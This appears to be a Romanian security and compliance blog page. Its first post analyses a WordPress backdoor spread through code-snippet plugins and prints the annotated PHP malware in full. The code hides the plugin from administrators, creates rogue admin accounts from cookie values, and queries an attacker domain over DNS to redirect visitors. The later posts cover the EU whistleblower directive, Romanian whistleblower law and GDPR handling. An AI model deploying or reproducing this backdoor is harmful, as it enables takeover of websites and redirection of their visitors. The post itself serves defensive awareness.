Categorii
devirusare site

Malware livrat prin pluginuri gen Cod Snippet

Recent a aparut o noua modalitate de a ascunde malware pe site-urile WordPress, utilizând pluginuri care oferă fragmente de cod PHP personalizate (Cod Snippets). De ce astfel de plugin-uri reprezintă automat un risc de securitate și ar trebui evitate pe toate site-urile WordPress ori de câte ori este posibil ?

Procedeul de atac:
Acces inițial: atacatorul foloseste privilegii la nivel de administrator, obținute prin exploit-uri sau vulnerabilități existente, pentru a instala un plugin pentru fragmente de cod din sursa oficială de pe WordPress.org. (Exemplu: Code Snipetts https://ro.wordpress.org/plugins/code-snippets/)

Ascundere: Se generează un fragment de cod care ascunde prezența pluginului pentru administrator. Acest lucru se realizează prin mascarea tuturor informațiilor aferente prin CSS si prin descărcarea imediată a pluginului folosind un Webhook WordPress.

Execuție: Malware-ul se executată automat la fiecare incarcare de pagină.

Iata un exemplu de cod folosit:

// Atacatorul isi seteaza parola de acces
$_pwsa = ‘password_string’;

// Atacatorul ascunde prezenta pluginului pentru administrator
if (current_user_can(‘administrator’) && !array_key_exists(‘show_all’, $_GET)) {
add_action(‘admin_print_scripts’, function () {
echo ‘<style>’;

echo ‘</style>’;
});
add_filter(‘all_plugins’, function ($plugins) {
unset($plugins[‘insert-headers-and-footers/ihaf.php’]);
return $plugins;
});
}

if (!function_exists(‘_red’)) {

  // Functie pentru decodarea cookie-urilor encodate base64
function _gcookie($n) {
return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : ”;
}

// Partea de control si exploatare
  // Verifica daca browserul are setata parola codata in cookie
if (!empty($_pwsa) && _gcookie(‘pw’) === $_pwsa) {

    // Optiuni
switch (_gcookie(‘c’)) {

      // Ascunde optiunile prin WordPress
case ‘sd’:
$d = _gcookie(‘d’);
if (strpos($d, ‘.’) > 0) {
update_option(‘d’, $d);
}
break;

// Isi creeaza un user cu drepturi de administrator pe site
      // username, password and e-mail sunt definite in cookie-urile u,p,e
case ‘au’:
$u = _gcookie(‘u’);
$p = _gcookie(‘p’);
$e = _gcookie(‘e’);
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
break;
}
return;
}

//Ascunde codul din pagina de login ca sa nu fie detectat
if (@stripos(wp_login_url(), ”.$_SERVER[‘SCRIPT_NAME’]) !== false) { return; }

// Isi ascunde codul pe o anumita pagina daca un anume cookie e gasit
if (_gcookie(„skip”) === „1”) { return; }

// Functii
function _is_mobile() { … }
function _is_iphone() { … }
function _user_ip()   { … }

function _red() {

// Nu face nimic daca sunt logati useri pe site
if (is_user_logged_in()) { return; }

// Nu face nimic daca IP-ul nu e set, cel mai probabil ca sa evite detectarea daca este rulat un tool ca WP CLI
$ip = _user_ip(); if (!$ip) { return; }

// Salveaza o lista cu adresele IP ale vizitatorilor
$exp = get_transient(‘exp’); if (!is_array($exp)) { $exp = array(); }

// Sterge adresa IP din lista daca au trecut 24h
foreach ($exp as $k => $v) { if (time() – $v > 86400) { unset($exp[$k]); } }

// Nu sterge adresa IP daca nu au trecut 24h
if (key_exists($ip, $exp) && (time() – $exp[$ip] < 86400)) { return; }

// Salveaza adresa ip a vizitatorului
$host = filter_var(parse_url(‘https://’ . $_SERVER[‘HTTP_HOST’], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
$ips = str_replace(‘:’, ‘-‘, $ip); $ips = str_replace(‘.’, ‘-‘, $ips);

// Salveaza domeniul atacatorului in optiuni
$h = ‘cdn-routing.com’;
$o = get_option(‘d’);
if ($o && strpos($o, ‘.’) > 0) { $h = $o; }

// Pregateste un request DNS
$m = _is_iphone() ? ‘i’ : ‘m’; $req = (!$host ? ‘unk.com’ : $host) . ‘.’ . (!$ips ? ‘0-0-0-0’ : $ips) . ‘.’ . mt_rand(100000, 999999) . ‘.’ . (_is_mobile() ? ‘n’ . $m : ‘nd’) . ‘.’ . $h;

// Trimite un request DNS catre un URL redirect
$s = null;
try {
$v = „d” . „ns_” . „get” . „_rec” . „ord”;
$s = @$v($req, DNS_TXT);
} catch (\Throwable $e) { } catch (\Exception $e) { }

    // Redirecteaza vizitatorul catre numele de domeniu al atacatorului
// Log the IP into storage
if (is_array($s) && !empty($s)) {
if (isset($s[0][‘txt’])) {
$s = $s[0][‘txt’];
$s = base64_decode($s);
if ($s == ‘err’) {
$exp[$ip] = time();
delete_transient(‘exp’);
set_transient(‘exp’, $exp);
} else if (substr($s, 0, 4) === ‘http’) {
$exp[$ip] = time();
delete_transient(‘exp’);
set_transient(‘exp’, $exp);
wp_redirect($s);
exit;
}
}
}
}
add_action(‘init’, ‘_red’);
}

 

Codul prezentat mai sus oferă atacatorului posibilitatea de a redirecționa vizitatorii site-ului web către orice alt domeniu pe care îl doreste. Backdoor-ul permite schimbarea domeniului.

Nu in ultimul rand, atacatorul poate, în orice moment, să-si creeze propriul utilizator cu drepturi de administrator pe site si să-l folosească după bunul plac – eventual perfectionand codul malware initial.

Categorii
whistleblowing

Directiva Whistleblower – Lege Avertizori De Integritate

directiva whistleblower

Directiva privind avertizorii de integritate este o directivă europeană care urmărește să protejeze pe cei care semnalează încălcări ale legii și a normelor de integritate în cadrul organizațiilor. Această directivă a fost adoptată în contextul creșterii importanței transparenței și a luptei împotriva corupției în societatea contemporană.

Contextul directivei privind avertizorii de integritate

Avertizorii de integritate, cunoscuți și sub denumirea de “whistleblowers”, joacă un rol esențial în combaterea corupției și protejarea interesului public. Directivele privind avertizorii de integritate au fost introduse ca răspuns la necesitatea de a oferi protecție și recunoaștere acestor persoane, care aduc la lumină încălcări ale legii și practici necinstite.

Importanța protejării avertizorilor de integritate

Protejarea avertizorilor de integritate este crucială pentru susținerea unui mediu de afaceri și politic curat și transparent. Acești avertizori pot aduce la cunoștința autorităților sau publicului practici ilegale, fraudă sau abuzuri. Prin asigurarea protecției lor, se creează o cultură de responsabilitate și un climat favorabil pentru o bună guvernare și etică în cadrul organizațiilor.

In România, Directiva privind avertizorii de integritate este un instrument important pentru protejarea persoanelor care aduc la lumină nereguli și corupție în diverse sectoare ale societății. Aceasta defineste avertizorii de integritate ca fiind persoanele care, în mod obiectiv și de bună-credință, semnalează autorităților sau publicului informații privind încălcări ale legii, acte de corupție sau alte abateri grave.

Categorii de informații protejate

Avertizorii de integritate pot furniza informații privind încălcări ale legii, incluzând corupția, spălarea de bani, frauda fiscală, abuzul de putere sau altele. Aceste informații sunt protejate și avertizorii nu pot fi sancționați pentru divulgarea lor, cu condiția ca acestea să fie făcute în mod responsabil și în interesul public.

Rolul avertizorilor de integritate în societate

Avertizorii de integritate joacă un rol crucial în combaterea corupției și în promovarea transparenței în instituțiile publice și private. Prin curajul lor de a dezvălui informații sensibile, acești avertizori pot contribui la dezvăluirea neregulilor și erorilor, punând în mișcare schimbări benefice pentru societate. Ei au nevoie de protecție legală și suport pentru a-și face vocea auzită fără frică de represalii.

Obligațiile angajatorilor conform directivei

Directiva privind avertizorii de integritate impune angajatorilor anumite obligații pentru a asigura protecția și susținerea avertizorilor de integritate, cei care raportează încălcări ale legii sau nereguli în cadrul organizației lor. Acesta este un pas important în promovarea transparenței și eticii în afaceri.

Crearea unui mecanism intern de raportare

Conform directivei, angajatorii trebuie să creeze un mecanism intern de raportare, care să permită avertizorilor de integritate să prezinte în mod confidențial și sigur informații referitoare la încălcări și nereguli. Acest mecanism ar trebui să ofere protecție împotriva sancțiunilor și represaliilor pentru avertizori și să faciliteze investigațiile adecvate.

Protecția avertizorilor de integritate împotriva represaliilor

Directivea privind avertizorii de integritate cere angajatorilor să asigure protecția avertizorilor de integritate împotriva oricăror formă de represalii. Acest lucru include protejarea confidențialității avertizorului, interzicerea sancțiunilor sau măsurilor negative împotriva acestuia și furnizarea de asistență juridică și suport adecvat.

Este important ca angajatorii să conștientizeze și să respecte aceste obligații conform directivei pentru a crea un mediu sigur și etic, care să încurajeze avertizorii să se manifeste și să contribuie la combaterea corupției și a altor încălcări ale legii în cadrul organizației.

Pregătirea și formarea avertizorilor de integritate

Un aspect esențial al unei organizații transparente și responsabile este dezvoltarea și pregătirea adecvată a avertizorilor de integritate. Acești avertizori joacă un rol crucial în raportarea abuzurilor și neregulilor în cadrul unei organizații.

Informarea privind drepturile și obligațiile

Pentru a asigura o bună pregătire și formare a avertizorilor de integritate, organizațiile trebuie să ofere informații clare și complete cu privire la drepturile și obligațiile acestora. Avertizorii ar trebui să fie conștienți de faptul că au dreptul la confidențialitate și protecție împotriva represaliilor, conform Directivei privind avertizorii de integritate.

Instruirea în materie de raportare și confidențialitate

De asemenea, este esențial să se ofere avertizorilor instruire adecvată în materie de raportare a abuzurilor și neregulilor, precum și în ceea ce privește menținerea confidențialității informațiilor furnizate. Organizațiile ar trebui să le ofere avertizorilor căi sigure de comunicare, astfel încât aceștia să poată raporta în mod eficient orice încălcare a integrității.

Asigurarea unei formări adecvate a avertizorilor de integritate este esențială pentru promovarea unui mediu de lucru etic și pentru combaterea corupției în cadrul organizațiilor. Fără o pregătire și formare adecvată, avertizorii nu ar putea juca rolul lor esențial în asigurarea transparenței și responsabilității în organizație.

Procedura de raportare și investigație în contextul directivei privind avertizorii de integritate este un aspect crucial pentru orice organizație.

Canale de raportare a încălcărilor

Este esențial ca organizațiile să ofere canale sigure și confidențiale de raportare a încălcărilor. Aceste canale pot include linii telefonice dedicate sau platforme online securizate. Avertizorii de integritate trebuie să aibă încredere că informațiile lor vor fi ținute confidențiale și tratate cu seriozitate.

Etapele procesului de investigație

Odată ce o încălcare este raportată, organizația trebuie să demareze o investigație cuprinzătoare și imparțială. Procesul de investigație poate include intervievarea martorilor, colectarea de dovezi și analiza acestora. Este esențial ca organizația să se asigure că toate informațiile sunt tratate cu confidențialitate și că toți cei implicați sunt respectați și protejați.

Directiva privind avertizorii de integritate are ca scop promovarea unui mediu sigur și etic în organizații, iar procedurile de raportare și investigație joacă un rol crucial în atingerea acestui obiectiv.

Categorii
whistleblowing

Interdictia represaliilor contra angajatilor care transmit avertizari de integritate

În conformitate cu Legea privind avertizorii de integritate, angajatorii trebuie să pună la dispozitia celor cei care raportează abateri la locul de muncă, un canal de avertizare intern sau extern. Așadar, angajatorii care „răzbună” împotriva angajaților avertizori, dacă aceste acțiuni sunt contestate în instanță, vor trebui sa demonstreze că acțiunile lor nu încalcă niciuna dintre prevederile Legii Whistleblowing, si respectiva masura luata importiva unui angajat a aparut într-un context diferit sau reprezintă o actiune ca urmare a unei abateri disciplinare, sau din alte motive.

În contextul Legii privind avertizarile de integritate (Legea 361/2022), represaliile sunt definite ca „orice act direct sau indirect,  în context profesional, impotriva celui care a facut o avetizare de integritate, pe un canal intern, extern sau o divulgare publica, care ii provoaca acestuia prejudicii.

De fapt, mai mult, apare ideea că atat o persoană care face o reportare sau dezvăluire publică, și cat si o altă persoană (asociat, fostă rudă etc.) care ajuta la acea dezvaluire, numita facilitator, urmează să beneficieze de protectie legală, conform legii. Conditia este ca represaliile cu care se confrunta sa fie rezultatul avertizarii publice.

Prevederile de sprijin, protecție și compensare din Legea privind raportarea de interes public se aplică nu numai raportorului, ci și susținătorilor și terților care pot fi supuși unor represalii profesionale asociate dezvaluirilor de interes public (colegii sau mediul familial, și persoane juridice care acționează în numele avertizorilor de interes public sau a altor instituții).

În conformitate cu Legea privind avertizorii, orice formă de răzbunare împotriva unui raport de integritate public este interzisă, inclusiv amenințarea cu represalii sau tentative de răzbunare, în special:

  1. orice suspendare a contractului individual de muncă ori a raportului de serviciu;
  2. concedierea sau eliberarea din funcţia publică;
  3. modificarea contractului de muncă sau a raportului de serviciu;
  4. reducerea salariului şi schimbarea programului de lucru;
  5. retrogradarea sau împiedicarea promovării în muncă sau în funcţia publică şi a dezvoltării profesionale, inclusiv prin evaluări negative ale performanţei profesionale individuale, inclusiv a funcţionarilor publici, sau prin recomandări negative pentru activitatea profesională desfăşurată;
  6. aplicarea oricărei alte sancţiuni disciplinare;
  7. constrângerea, intimidarea, hărţuirea;
  8. discriminarea, crearea unui alt dezavantaj sau supunerea la un tratament inechitabil;
  9. refuzul de a transforma un contract de muncă pe o perioadă determinată într-un contract de muncă pe durată nedeterminată, în cazul în care lucrătorul a avut aşteptări legitime că i s-ar oferi un post permanent;
  10. refuzul de a reînnoi un contract de muncă pe o perioadă determinată sau încetarea anticipată a unui astfel de contract;
  11. cauzarea de prejudicii, inclusiv la adresa reputaţiei persoanei în cauză, în special pe platformele de comunicare socială, sau pierderi financiare, inclusiv sub forma pierderii oportunităţilor de afaceri şi a pierderii de venituri;
  12. includerea pe o listă sau într-o bază de date negativă, pe baza unui acord sectorial sau la nivel de industrie, formal sau informal, care poate presupune că persoana în cauză nu îşi va găsi, în viitor, un loc de muncă în respectivul sector sau în respectiva industrie;
  13. rezilierea unilaterală extrajudiciară a unui contract pentru bunuri sau servicii, fără a fi îndeplinite condiţiile în acest sens;
  14. anularea unei licenţe sau a unui permis;
  15. solicitarea de efectuare a unei evaluări psihiatrice sau medicale.

Cine trebuie să dovedească legătura dintre represalii și raportare?

Dacă avertizorul considera ca este subiectul unei actiuni de represalii, se poate adresa unei instante de judecata, să conteste acțiunea sau măsurile luate împotriva sa, prin depunerea unei cereri la respectiva instanța competentă, potrivit împrejurărilor si litigiului.

Ce trebuie subliniat, este ca Legea privind denunțatorii precizează clar că sarcina probei în aceste litigii revine pârâtului, adica angajatorului. Mai concret, de exemplu, angajatorul, în cazul în care litigiul este angajator-salariat, este cel care trebuie să dovedească instanței că nu există nicio legătură între avertizarea/raportul de avertizare și acțiunile efectuate impotriva angajatului. Sarcina de a dovedi în cadrul procesului că circumstanțele sunt rezonabile, si din alte motive decat cele legate de dezvăluire revine angajatorilor sau entitatilor reclamate, după caz”.

Sursa: hackeradvisor.com

 

Categorii
whistleblowing

Ghid de prelucrare a datelor personale in relatie cu implementarea Directivei Whistleblowing

Implementarea Whistleblowing servește la dezvăluirea incalcarilor ale legilor europene sau a corupției. O provocare cheie in contextul prevenirii corupției in interiorul Uniunii Europene este să detecteze și să dezvăluie mita, frauda, furtul și alte incalcari ale legii la locul de muncă. Avertizorul de integritate dezvăluie un astfel de comportament neetic.

Deoarece avertizorii se pot confrunta cu represalii sub formă de hărțuire, concedieri, înscriere pe lista neagră, amenințări și/sau dezvăluirile lor sunt ignorate, legea îi protejează pe avertizori împotriva represaliilor. Prin urmare, confidențialitatea, inclusiv protecția identității, este esențială și o modalitate eficientă de a încuraja personalul să raporteze incalcari ale legii la locul de munca.

Lista de recomandari de Implementare a Directivei Whistleblowing, cu respectarea principiilor GDPR:

  1. Implementați canale bine definite pentru raportarea internă și externă și reguli specifice unde

scopul este clar precizat;

  1. Asigurați confidențialitatea informațiilor primite și protejați identitatea avertizorilor

și toate celelalte persoane implicate;

  1. Aplicați principiul minimizării datelor: procesați doar informațiile personale, adică

adecvate, relevante și necesare, pentru cazul particular raportat;

  1. Identificați ce înseamnă informațiile personale în acest context și care sunt cei afectați. Acestora trebuie sa le fie asigurat dreptul la informare, acces și rectificare asupra datelor personale. Restricțiile la aceste drepturi sunt permise, atâta timp cât exista reguli interne în vigoare, și sunt în măsură să se furnizeze motive documentate înainte de a lua o astfel de decizie;
  2. Aplicați procedure pentru a informa fiecare categorie de indivizi interesați despre cum

datele acestora vor fi prelucrate;

  1. Asigurați-vă, atunci când răspundeți la solicitările de drept de acces, că informațiile personale ale altor părți nu sunt dezvăluite;
  2. Evaluați cine este indrituit sa primeasca si sa proceseze avertizarile (persoana desemnata intern sau externă) și apoi limitați transferul de informații personale numai atunci când este necesar pentru efectuarea legitimă a unei sarcini acoperite de competența destinatarului;
  3. Definiți perioade de stocare a datelor personale proporționale pentru informațiile personale procesate în cadrul domeniul de aplicare al procedurii de avertizare în funcție de rezultatul fiecărui caz;
  4. Implementați măsuri de securitate atât organizaționale, cât și tehnice pe baza unei evaluări a riscurilor a procedurii de avertizare, în vederea garantării unei proceduri legale și sigure pentru prelucrarea informațiilor personale.

Procedurile de avertizare de integritate sunt menite să ofere canale sigure pentru oricine devine conștient și raportează potențialele fraude, corupție sau alte incalcari grave și nereguli. Procedurile de avertizare îi protejează pe avertizori și dezvăluirile facute de acestia, care sunt de interes public. Procedurile de avertizare nu sunt destinate reclamatiilor sau plângerilor.

Procedurile de avertizare cuprind prelucrarea unor categorii speciale de date. Companiile sau autoritatile publice sunt obligate să gestioneze rapoartele de avertizare și să asigure protecția persoanelor, informarea avertizorilor, a presupusilor infractori, a martorilor și a celorlalte persoane care apar în raport. Principiile de protecție a datelor personale pot să fie utilizate pentru a consolida procedurile de avertizare. Prin urmare, aplicarea principiilor de protecție a datelor personale vor ajuta la crearea unor canale de încredere prin consolidarea securității si confidentialitatii.

Categorii
whistleblowing

Asigurarea de canale sigure pentru Implementarea directivei pentru avertizari de integritate

Confidentilitatea in procedurile de avertizare Whistleblowing

 

Cea mai eficientă modalitate de a încuraja personalul să raporteze incalcarile, este să vă asigurați că acestea identitatea acestora va fi protejată. Prin urmare, ar trebui să existe canale clar definite pentru raportari interne și externe și protecția informațiilor primite.

Identitatea avertizorului care semnalează cu bună-credință, abateri grave sau nereguli, ar trebui tratata cu cea mai mare confidențialitate, deoarece ar trebui să fie protejata împotriva oricăror

represalii. Identitatea avertizorilor nu ar trebui niciodată dezvăluită decât în anumite cazuri excepționale, circumstanțe în cazul în care avertizorul autorizează o astfel de dezvăluire, sau dacă acest lucru este cerut de vreo procedura penala ulterioara, sau, în cazul în care avertizorul face cu rea vointa un acuzatii false. În acest din urmă caz, aceste date cu caracter personal pot fi dezvăluite doar autorităţilor judiciare.

O declarație este făcută cu rea vointa dacă avertizorul raportează activități despre care ei știu că sunt neadevărate. Dacă o institutie sau companie descopera că un avertizor a făcut o acuzație neîntemeiată, cu rea vointa, responsabilitatea revine instituției de a dovedi ca acuzațiile au fost facute cu rea vointa.

Persoana/personele împotriva căreia s-a făcut o acuzație ar trebui să fie protejată în aceeași masura ca si avertizorul, deoarece există riscul de stigmatizare și victimizare în cadrul organizației lor. Ei vor fi expuși unor astfel de riscuri chiar înainte de a-și da seama că au fost incriminaţi şi faptele pretinse au fost analizate pentru a se stabili dacă pot fi susţinute sau nu.

Rapoartele de avertizare pot include, de asemenea, informații personale despre terțe persoane, cum ar fi martorii sau colegii. Informațiile lor personale ar trebui, de asemenea, protejate in toate etapele procedurii.

Prin urmare, accesul intern la informațiile prelucrate în cadrul anchetei acuzațiilor, trebuie să fie acordate strict pe baza necesității de a cunoaște, cu alte cuvinte, sub rezerva necesitatii. Cei care se ocupă de gestionarea rapoartelor ar trebui, de exemplu, să fie obligati la a pastra secretul si confidentialitatea informatiilor pe care le primesc. De asemenea, informațiile personale trebuie stocate în siguranță.

Orice informație cu caracter personal legată de avetizari si păstrata în scopuri statistice ar trebui

fie anonimizata. Operatorii ar trebui să fie deosebit de precauți cu orice informație care poate duce la identificarea indirectă a avertizorului. De exemplu, reținând atât tipul de caz de avertizare, împreună cu naționalitatea avertizorului ar putea conduce la identificarea indirectă și, prin urmare, ar trebui evitată.

 

Evitarea abuzului procedurilor de avertizare Whistleblowing

 

Sfera de aplicare a procedurii trebuie limitată pentru a evita abuzul acesteia. Scopul procedurii de avertizare trebuie specificat în mod clar în interiorul organizatiei.

Regulile interne sau o politică Whistleblowing ar trebui să descrie în mod explicit în ce circumstanțe trebuie utilizate canalele de avertizare si cand nu ar trebui. În general, canalele de avertizare nu ar trebui folosite atunci când personalul dorește de a-și exercita drepturile statutare, adică prin depunerea unei cereri sau plângeri la numire, sau pentru reclamații de hărțuire și neînțelegeri personale atunci când personalul se poate adresa HR, serviciului de mediere, etc.

Normele interne sau o politică ar trebui, în plus, să descrie acele informații sensibile, cum ar fi originea rasială sau etnică, opiniile politice, convingerile religioase sau filozofice, apartenența la sindicate și datele privind sănătatea sau viața sexuala, care nu sunt relevante pentru caz, nu ar trebui să fie colectate. Acest lucru va ajuta la evitarea colectării excesive de informații personal.

În principiu, denunțarea nu ar trebui să fie anonimă. Avertizorii ar trebui să fie invitați să se identifice, nu numai pentru a evita abuzul de procedură, ci și pentru a permite protecția lor efectivă împotriva oricăror represalii. Acest lucru va permite, de asemenea, un management mai bun al dosarului dacă este necesar să se colecteze informații suplimentare.

sursa: whistleblow.ro

Categorii
whistleblowing

Directiva Whistleblowing si procesarea datelor personale conform GDPR

Identificarea datelor personale colectate intr-o sesizare de integritate (Whistleblowing)

 

Datele personale sunt definite ca orice informație care se referă la o persoană identificată sau persoana fizica identificabila. Datele personale nu includ doar informații despre viața privată și viața de familie a individului, dar și informații referitoare la activități, cum ar fi relațiile sale de muncă și comportamentul economic sau social. Aceste aspecte trebuie luate în considerare, de exemplu, atunci când se determină sfera de aplicare a datelor personale ale subiectului si dreptul de acces/rectificare la aceste date personale. În cele mai multe cazuri, in cazul unei sesizari de integritate, datele personale colectate includ date de identificare (de exemplu, detalii de contact), dar și informații care se referă la comportamentul unui individ.

Spre exemplu, sesizarea unui avertizor de integritate include informații care îl identifică pe presupusul acuzat in sezizare și martori. Sesizarea în sine cuprinde de asemenea, informații personale ale avertizorului deoarece se referă la comportamentul său (ca avertizor).

Pe de altă parte, simplul fapt că un nume este menționat într-un document nu face obligatoriu ca toate informațiile conținute în acel document sa fie „date personale referitoare la acea persoană”. În multe situații, informațiile pot fi considerate ca se referă la un individ, doar când este vorba despre acel individ in sesizare (ca martor sau acuzat).

Dreptul la informare al subiectilor unei sesizari de integritate

 

Informațiile privind procedurile de avertizare ar trebui furnizate persoanelor intr-un mod foarte clar, care va implica o procedură în două etape. SE consideră informarea printr-o nota de confidentialitate plasata pe un site web, nu este suficienta, deoarece informațiile ar putea fi trecute cu vederea.

Toate persoanele afectate direct sau indirect de o sesizare de avertizare, ar trebui să fie informate direct, cat mai repede posibil, spre exemplu prin email, printr-o notificare specifica privind protectia datelor personale. Persoanele afectate sunt de obicei avertizori, martori, terți (membri ai personalului organizatiei sau alții care sunt doar citați). și persoana (persoanele) împotriva căruia i s-au făcut acuzaţiile.

Informarea avertizorului de integritate I (cf. art 16)

 

În acest context, este important să fie informati toți cei implicați în avertizare (avertizorii), ca informațiile lor personale vor fi partajate cu potențiali destinatari sau categorii de destinatari. În plus, notificarea privind protecția datelor ar trebui să îi informeze și despre consecințele abuzului procedurii de avertizare (dacă denuntatorul face cu rea vointa o declarație falsă, de exemplu), cum ar fi măsuri disciplinare, amenzi prevazute de lege, sau alte consecinte.

Informarea celui acuzat intr-o sesizare de avertizare Whistleblowing

 

În anumite cazuri, informarea persoanei împotriva căreia s-a făcut o acuzație, intr-un stadiu incipient, poate fi dăunător cazului. În aceste cazuri, informațiile ar putea fi restricționate. Amânarea informarii celui acuzat intr-o procedura Whistleblowing ar trebui să fie hotărâta de la caz la caz. Motivele oricăror restricții asupra dreptului la informare ar trebui să fie documentate. Aceste motive ar trebui să demonstreze, de exemplu, că există un risc mare ca oferirea dreptului de acces ar împiedica procedura de ancheta sau ar submina drepturile și libertatea altora. Motivele ar trebui documentate înainte de decizia de a aplica orice restricție sau amânare a dreptului de acces si informare.

Informarea martorilor intr-o sesizare de avertizare Whistleblowing

Informații specifice despre avertizare ar trebui furnizate cât mai curând posibil practic martorilor, spre exemplu înainte de a fi intervievați de către organizatie.

Informarea tertilor implicati intr-o procedura de avertizare de integritate

 

În funcție de caz, informarea tuturor terților menționați într-o avertizare de integritate, ar putea implica un efort disproporționat. Evaluarea dacă este un effort disproporționat, sau neinformarea terților trebuie efectuată de la caz la caz. Mai mult, în anumite cazuri, informarea persoanelor ar fi in plus, o operație de procesare care ar putea fi mai intruzivă decât cea originală.

Exemplu: Un avertizor atașează raportului de avertizare o listă cu clienții (200 de persoane) ai unui hotel pentru a dovedi că presupusul acuzat se afla în hotel la o anumită dată. Ceilalți 199 de clienți nu au nici o legătura cu cazul, și informațiile acestora nu sunt prelucrate în continuare de către instituție. Ei nu trebuie informati.

Categorii
whistleblowing

Conformitatea GDPR intr-o procedura de avertizare de integritate

Principiul responsabilitatii înseamnă că o oragnizatie trebuie să își respecte obligațiile de protecție a datelor personale și să poată demonstra că o face. (Articolul 4 alineatul (2) și articolul 26 din regulamentul GDPR). Responsabilitatea nu este specifică informațiilor personale în cadrul unei proceduri de avertizare Whistleblowing, ci se aplică tuturor operațiunilor care prelucrează informații personale.

Orice organizatie care colectează, utilizează și stochează (cunoscute în mod colectiv ca procesare) informații personale este responsabilă și răspunzătoare pentru respectarea regulilor de protecție a datelor personale.

În general, oragnizatiile trebuie să fie transparente și explicite cu privire la modul în care prelucrează informațiile personale legate de procedurile de avertizare Whistleblowing. Ele trebuie să-și documenteze politicile și să îi informeze pe utilizatori. Dreptul la confidențialitate și la protecția datelor există și la locul de muncă și oamenii trebuie să fie informați cu privire la procedură. Organizatia nu poate presupune că personalul trebuie sa știe. (Articolul 14 din regulament).

Cel mai bun mod pentru ca o organizatie să fie responsabila, este ca acesta să ia în considerare implicațiile noilor procese în materie de protecție a datelor personale în etapa de proiectare (privacy by design, articolul 27 din regulament). Operațiunile de prelucrare diferite și tehnologiile diferite necesită garanții diferite. Prin implicarea responsabilului cu protecția datelor (DPO) la începutul procesului, aceștia vor putea oferi sfaturi și îndrumări valoroase.

Întrebările enumerate mai jos subliniază principalele probleme de luat în considerare:

  1. Confidențialitate: Cum protejezi persoanele implicate?
  2. Precizați scopul: Când să utilizați canalul de avertizare?
  3. Evitați sa colectati informații excesive: Ce informații sunt necesare în contextual acuzatiilor facute?
  4. Identificați sensul informațiilor personale: Care sunt informațiile personale continute in raportul de avertizare?
  5. Informați fiecare categorie de subiecti: Cine este afectat de avertizarea de integritate?
  6. Ar trebui să se aplice diferite perioade de pastrare a datelor: Cât timp trebuie să păstrez raportul de avertizare si informatiile colectate?
  7. Efectuați o evaluare a riscului de securitate a informațiilor: care sunt potențialele riscuri de securitate pentru informațiile personale conținute în sesizarile de avertizare și cum vei trata aceste riscuri?

Pentru a demonstra responsabilitatea, trebuie intocmite proceduri și implementarea acestora trebuie să fie documentate. Sunt necesare următoarele documente:

  1. o politică sau reguli interne, sau o decizie privind avertizarile de integritate;
  2. limitări ale anumitor drepturi ale persoanelor vizate, motivele pe care se întemeiază limitările și raționamentul in aplicarea unor astfel de restricții;
  3. orice amânare a accesului la informații a subiectilor (în conformitate cu regulile interne);
  4. evaluarea riscurilor efectuată pentru această procedură specifica Whistleblowing.

sursa: www.whistleblow.ro

Categorii
whistleblowing

Evaluarea dreptului de acces la datele personale intr-o procedura Whistleblowing

Atunci când iau în considerare drepturile de acces la datele personale procesate intr-o procedura de avertizare de integritate, ar trebui să ia în considerare statutul solicitantului și etapa anchetei, nivelul și sensibilitatea informațiilor deținute (și orice risc asociat de dezvăluire). Drepturile de acces vor varia în funcție de si dacă cererea este făcută de:

– persoana împotriva căreia s-a făcut o acuzație

– avertizorul de integritate

– un martor

– terți

 

Inainte de aplicarea unei restricții la dreptul la informare si acces (conform GDPR), într-un caz specific, trebuie să fie un faca un test de necesitate și proporționalitate și organizatia trebuie să documenteze motivele care stau la baza deciziei, pentru a fi tinuta responsabila.

Exemplu: Un denunțător (A) raportează o fraudă suspectată de către un coleg și superior (B). După încheierea anchetei, B solicită accesul la datele sale personale prelucrate în acest scop. Părți din afirmațiile făcute de A se califică drept date personale ale lui B. Organizatia ar putea justifica o restricție în temeiul articolului 25 alineatul (1) litera (h) cu privire la faptul că A a furnizat datele și dacă s-ar putea presupune că A a furnizat aceste informații, A ar putea face obiectul represaliilor din partea B. Acest lucru ar trebui să fie documentat intern. În mod evident, lui B nu ar trebui să i se spună că motivul restricției este că A ar putea suferi represalii, deoarece ar anula efectul restricției în conformitate cu articolul 25 alineatul (8). Prin urmare, informațiile comunicate lui B în temeiul articolului 25 alineatul (6) ar trebui formulate într-un mod mai general.

Atunci când se acordă drept de acces la informațiile personale ale oricărei persoane în cauză, informațiile personale ale terților, cum ar fi informatorii, avertizorii sau martorii, ar trebui eliminate din documente, cu excepția unor circumstanțe excepționale, dacă avertizorul autorizează o astfel de dezvăluire, dacă acest lucru este cerut de vreo procedurila penale ulterioara, sau în cazul în care avertizorul face cu rea vointa o declarație falsă.

Dacă exista un risc de identificare al terților, accesul la date ar trebui amânat. Directiva prevede o obligație de confidențialitate (articolul 16 alineatul (1)) cu obligația statelor membre de a se asigura că identitatea persoanei raportoare (avertizorul de integritate) nu este dezvăluită nimănui în afara membrilor personalului autorizat al organizatiei, fără consimțământul explicit al persoanei respective. Acest lucru este deosebit de important pentru a garanta că persoanele sunt protejate de orice riscuri potențiale implicate în dezvăluirea informațiilor lor personale.

Exemplu: Un angajat al UE acuzat de infracțiuni grave solicită instituției toate informațiile personale deținute despre el în legătură cu acuzațiile. O mare parte din aceste informații sunt incluse în mărturiile date de avertizor. Chiar dacă numele avertizorului este șters din aceste documente, identitatea acestora ar putea fi deconspirata prin referire la evenimentele, situațiile și contextele specifice descrise. Astfel, instituția ar trebui să refuze divulgarea acestor informații, justificat de protecția persoanei vizate (Whistleblower) sau a drepturilor și libertăților altora (articolul 25 alineatul (1) litera (h)).

sursa: www.whistleblow.ro

Categorii
gdpr

Poți solicita acum în mod GRATUIT, conținutul Politicii de confidențialitate

În ultimii 20 de ani domeniul online a cunoscut și la noi în țară o dezvoltare extraordinară. Cu atât mai mult în ultimii doi ani! Forțați de împrejurări, foarte multe locuri de muncă precum și toate programele de pregătire școlară au trecut în mediul online pentru a asigura o bună protecție a tuturor persoanelor pe perioada pandemiei.

În zilele noastre, aproape orice companie comercială alege să își deschidă și un magazin online! Cumpărăturile online sunt preferate de clienți deoarece oferă o gamă mult mai variată de produse, se fac mult mai simplu, există posibilitatea de a returna produsele dacă nu sunt mulțumiți de ceea ce au cumpărat, etc.

